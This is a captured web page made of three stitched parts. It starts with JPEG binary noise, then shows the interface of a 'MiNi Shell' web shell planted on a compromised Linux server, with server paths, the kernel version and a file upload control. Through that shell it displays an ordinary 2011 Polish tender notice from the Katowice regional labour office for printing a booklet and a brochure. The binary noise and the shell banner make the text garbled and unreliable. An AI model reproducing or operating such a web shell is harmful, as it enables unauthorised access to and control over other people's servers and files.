JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111003/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111003/259789-N-2011.html

<p class="kh_header"><b>Katowice: Opracowanie graficzne, skład oraz wydruk informatora pt.Gminne Centra Informacji woj. śląskiego oraz broszury pt.Narzędzia wspierające osoby wykluczone społecznie</b><br>
<b>Numer ogłoszenia: 259789 - 2011; data zamieszczenia: 03.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie graficzne, skład oraz wydruk informatora pt.Gminne Centra Informacji woj. śląskiego oraz broszury pt.Narzędzia wspierające osoby wykluczone społecznie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w części I jest opracowanie graficzne, skład, wydruk oraz dostawa do siedziby Zamawiającego (Katowice, ul. Kościuszki 30, pokój 331) informatora oraz płyt CD w opakowaniu plastikowym z wersją MS Word (.doc.) oraz PDF nagranego informatora. 
Przedmiotem zamówienia w części II jest skład i wydruk oraz dostawa do siedziby Zamawiającego (Katowice, ul. Kościuszki 30, pokój 331) broszury z płytą CD podsumowującej realizację projektu partnerskiego pn. Narzędzia wspierające osoby wykluczone społecznie w ramach Programu Uczenie się przez całe życie Leonardo da Vinci..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I
Zamawiający uzna spełnienie w/w warunku, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie 2 usługi o wartości nie mniejszej niż 9 000,00 zł każda, odpowiadające swoim rodzajem przedmiotowi zamówienia.

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia w/w warunku według formuły spełnia/nie spełnia na podstawie załączonego do oferty wykazu 2 usług wykonanych bądź wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przy czym przedmiot każdej usługi odpowiada przedmiotowi zamówienia, z podaniem nazwy jednostki, dla której świadczona była usługa daty jej realizacji, wartości (przy każdej usłudze należy wpisać kwotę, za jaką została zrealizowana, gdyż zgodnie z warunkiem wartość jednej usługi ma być nie mniejsza niż 9 000,00 zł) oraz załączeniem dokumentów potwierdzających, że usługi wymienione w wykazie zostały wykonane lub są wykonywane należycie (np. referencje). Nie wykazanie spełnienia w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. Dokumenty potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub czytelnej kserokopii poświadczonej Za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do występowania w imieniu Wykonawcy.

CZĘŚĆ II

Zamawiający uzna spełnienie w/w warunku, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie 2 usługi o wartości nie mniejszej niż 2 500,00 zł każda, odpowiadające swoim rodzajem przedmiotowi zamówienia.

	Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia w/w warunku według formuły spełnia/nie spełnia na podstawie załączonego do oferty wykazu 2 usług wykonanych bądź wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przy czym przedmiot każdej usługi odpowiada przedmiotowi zamówienia, z podaniem nazwy jednostki, dla której świadczona była usługa daty jej realizacji, wartości (przy każdej usłudze należy wpisać kwotę, za jaką została zrealizowana, gdyż zgodnie z warunkiem wartość jednej usługi ma być nie mniejsza niż 2 500,00 zł) oraz załączeniem dokumentów potwierdzających, że usługi wymienione w wykazie zostały wykonane lub są wykonywane należycie (np. referencje). Nie wykazanie spełnienia w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. Dokumenty potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub czytelnej kserokopii poświadczonej Za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do występowania w imieniu Wykonawcy.

Nie wykazanie spełnienia w/w warunku skutkować będzie wykluczeniem Wykonawcy 
z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w  takiej sytuacji  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 30
40-048 Katowice
piętro III pok. 305.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2011 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 30
40-048 Katowice
piętro II pok. 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WYKONANIE PUBLIKACJI INFORMATORA NT. DOBRYCH PRAKTYK GCI W WOJ. ŚLĄSKIM PT. GMINNE CENTRA INFORMACJI WOJEWÓDZTWA ŚLĄSKIEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I
Przedmiotem zamówienia jest opracowanie graficzne, skład, wydruk oraz dostawa do siedziby Zamawiającego (Katowice, ul. Kościuszki 30, pokój 331) informatora oraz płyt CD w opakowaniu plastikowym z wersją MS Word (.doc.) oraz PDF nagranego informatora. 

Parametry techniczne informatora:
- ilość: 1000 sztuk (okładka + 64 strony),
- format książki 21 cm X 21 cm,
- papier: okładka na papierze kredowym 250g/m2, jednostronnie zadrukowana w pełnym kolorze (4 + 0 CMYK), uszlachetnienie - folia błysk jednostronnie, poszczególne strony na papierze kredowym matowym 130g/m2. Środek - zadruk w pełnym kolorze. Strony informatora mocno zszyte ze sobą na grzbiecie.
- płyta CD zostanie wydana w plastikowym opakowaniu, w 12 egzemplarzach.
Drukowanie w jednej kolumnie na stronie. Nadruk w kolorze wyraźnie odznaczającym się na tle papieru, nie utrudniającym czytania. Czcionka: rozmiar i krój jednolite w całym opracowaniu z wyjątkiem tytułów, leadów bądź wymaganych wyróżnień.
Informator powinien posiadać loga Wojewódzkiego Urzędu Pracy w Katowicach oraz województwa śląskiego Śląskie. Pozytywna energia. Informator będzie składał się ze spisu treści, wprowadzenia, opracowań 10 GCI, wykazu GCI, opisu zakresu działań WUP w Katowicach, mapy konturowej woj. Śląskiego z lokalizacją powiatów i wszystkich GCI w regionie.
Projekt okładki i środka będzie zawierać zdjęcia i/lub grafiki, które będą zajmować nie mniej niż 30 proc. Powierzchni informatora, w tym przynajmniej 30 zdjęć. Zdjęcia będą dostarczone przez zamawiającego w formacie JPG. Zamieszczone zdjęcia nie powinny mieć rozmiaru mniejszego niż 8 cm x 6 cm.
Każde opisywane opracowanie GCI będzie poprzedzone stroną zawierającą: nazwę GCI, jej logo, dane kontaktowe (adres, adres internetowy, strona internetowa, tel./fax, z drugiej strony umieszczona zostanie mapa konturowa województwa śląskiego z wyszczególnionym powiatem oraz miastem, 
z którego pochodzi GCI. Na okładce z przodu będą się znajdować zdjęcia z GCI (10 zdjęć). Tylna okładka będzie składana, po otwarciu na wewnętrznej stronie będzie stanowiła dwie strony, na tych dwóch stronach będzie się znajdowała mapa konturowa woj. Śląskiego z zaznaczeniem powiatów 
i miast, z których wywodzą się GCI wraz z legendą (odniesienie do konkretnych GCI z adresami).
Na płycie CD będzie tłoczenie tożsame z zawartością strony tytułowej informatora oraz włożona będzie okładka tytułowa z przodu pudełka, na płycie i okładce będzie napis, że płytkę sfinansowano ze środków Funduszu Pracy.
Wykonawca wyłoniony w toku prowadzonego postępowania, otrzyma treść informatora - tekst przekazany zostanie wraz z fotografiami i innymi grafikami w dniu podpisania umowy.

Zakres przedmiotu zamówienia obejmuje:
- projekt układu graficznego,

- opracowanie zawartości merytorycznej w uzgodnieniu z Zamawiającym, teksty opracowuje Wykonawca, we współpracy z wyznaczonym pracownikiem WUP w Katowicach,

- wszystkie teksty będą zatwierdzone przez wyznaczonego pracownika WUP w Katowicach do 5 dni  roboczych od daty ich dostarczenia,

- korekty tekstów nanoszone są przez wyznaczonego pracownika WUP w Katowicach; wszelkie zmiany dokonane w tekście przez Zamawiającego muszą zostać uwzględnione,
- korekta językowa tekstów należy do Wykonawcy w uzgodnieniu z wyznaczonym pracownikiem WUP,

- wykonanie i przygotowanie graficzne fotografii, map konturowych, loga należy do Wykonawcy zgodnie z materiałem przekazanym przez Zamawiającego,

- techniczne przygotowanie informatora do druku, skład i łamanie tekstów na kolumnach należy do Wykonawcy,

- układ graficzny informatora (makieta) musi zostać zatwierdzony przez Zamawiającego,

- Zamawiający zatwierdza makietę w terminie do 3 dni roboczych od dnia dostarczenia jej do wyznaczonego do współpracy pracownika WUP w Katowicach,

- druk i dostarczenie gotowych materiałów  publikacji należy do Wykonawcy,

- Wykonawca odpowiada za: błędy literowe, układ i jakość drukowanych zdjęć, błędne podpisy pod zdjęciami, które pojawią się w informatorze z winy Wykonawcy

- Wykonawca zobowiązuje się do usunięcia wszelkich wad druku, które nie wynikły z winy Zamawiającego na własny koszt w terminie 5 dni,

-  na okładce informatora musi znaleźć się logo województwa śląskiego oraz logo Wojewódzkiego Urzędu Pracy w Katowicach, na wewnętrznej stronie okładki musi znaleźć się informacja, że publikacja została sfinansowana ze środków Funduszu Pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WYKONANIE BROSZURY Z PŁYTĄ CD PODSUMOWUJĄCEJ REALIZACJĘ PROJEKTU PARTNERSKIEGO PN. NARZĘDZIA WSPIERAJĄCE OSOBY WYKLUCZONE SPOŁECZNIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest skład i wydruk oraz dostawa do siedziby Zamawiającego (Katowice, ul. Kościuszki 30, pokój 331) broszury z płytą CD podsumowującej realizację projektu partnerskiego pn. Narzędzia wspierające osoby wykluczone społecznie w ramach Programu Uczenie się przez całe życie Leonardo da Vinci.

Parametry techniczne broszury z płytą CD:
- ilość: 200 sztuk, wydanie dwujęzyczne w języku polskim oraz języku angielskim,
- okładka: format po złożeniu wymiar 190 mm x 150 mm, okładka 250 g/m2, kolorystyka okładki oraz środka: pełny kolor 4+4 offset, środek: papier kreda mat, 135 g/m2; szycie sprężyną wzdłuż dłuższego lewego brzegu (kolor sprężyny do akceptacji Zamawiającego). Objętość: 4 strony okładki + maksymalnie 70 stron środka (do akceptacji przez Zamawiającego), wysokość i typ czcionki do ustalenia z Zamawiającym podczas realizacji zamówienia (ograniczenie: ustalona liczba stron). Okładka: folia mat, lakier wybiórczy UV, pozostałe elementy - offset. Przednia i tylna część okładki, środek okładki - zgodnie z przekazanym projektem. Środek drukowany dwustronnie.
- płyta CD stanowi integralną część broszury, do umieszczenia w wewnętrznej stronie okładki, z tyłu, mocowanie: stabilne, tworzywo piankowe umożliwiające nałożenie płyty; ilość płyt: 200 sztuk; każda z płyt powinna mieć tłoczenie z nazwą projektu, logami instytucji partnerskich, logiem Programu Uczenie się przez całe życie Leonardo da Vinci, oraz informacją na temat źródła finansowania projektu; materiał do zamieszczenia na płycie będzie stanowił końcowy materiał publikacji do wydruku przekonwertowany na plik PDF, wersja w języku polskim i wersja w języku angielskim oraz dodatkowo prezentacje multimedialne w plikach PDF dostarczone przez Zamawiającego.

Pierwsza część publikacji będzie w języku polskim. Druga część publikacji będzie w języku angielskim. Dwie wersje językowe broszury będzie rozdzielała karta ze zdjęciami - zadrukowana dwustronnie (po 4 zdjęcia na stronie).

Wykonawca, wyłoniony w toku prowadzonego postępowania, otrzyma wstępny/roboczy projekt graficzny (treść broszury wraz z fotografiami) w dniu podpisania umowy.


Zakres przedmiotu zamówienia obejmuje:
- skład, łamanie i druk broszury wraz z płytą CD o projekcie partnerskim pn. Narzędzia wspierające osoby wykluczone społecznie oraz jej dostarczenie do siedziby Zamawiającego (Wojewódzki Urząd Pracy w Katowicach, Kościuszki 30, 40 - 048 Katowice);

- wstępny/bazowy projekt graficzny oraz materiał merytoryczny broszury opracowuje Zamawiający - pracownik WUP w Katowicach;

- techniczne przygotowanie broszury do druku, skład i łamanie tekstów na kolumnach należy do Wykonawcy;

- wstępny/bazowy projekt graficzny i struktura broszury zostały wstępnie opracowane, Zamawiający przygotuje opracowany projekt graficzny do wydruku poprzez użycie właściwych programów komputerowych; techniczne przygotowanie broszury do druku, skład i łamanie tekstów na kolumnach należy do Wykonawcy; całość musi zostać zatwierdzona przez Zamawiającego; ewentualnie uwagi Zamawiającego do projektu graficznego zostaną przekazywane w ciągu 3 dni roboczych od dnia dostarczenia do pracownika WUP w Katowicach; Wykonawca nie może dokonywać istotnych zmian w przekazanym opracowaniu graficznym; w przypadku potrzeby dokonania zmian, Wykonawca musi uzyskać zgodę i akceptację Zamawiającego;

- Wykonawca przedstawi wstępną wersję materiału przed wydrukiem, która zostanie zatwierdzona w ciągu 5 dni od jej otrzymania przez pracownika WUP w Katowicach; wszelkie zmiany i uwagi w tekście przez Zamawiającego muszą zostać uwzględnione przez Wykonawcę;

- korekty tekstów/uwagi nanoszone są przez wyznaczonego pracownika WUP w Katowicach; wszelkie zmiany dokonane w tekście przez Zamawiającego muszą zostać uwzględnione;

- Wykonawca odpowiada za: błędy literowe, układ i jakość drukowanych zdjęć;

- Wykonawca zobowiązuje się do usunięcia wszelkich wad druku, które nie wynikły z winy Zamawiającego na własny koszt w terminie 5 dni;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com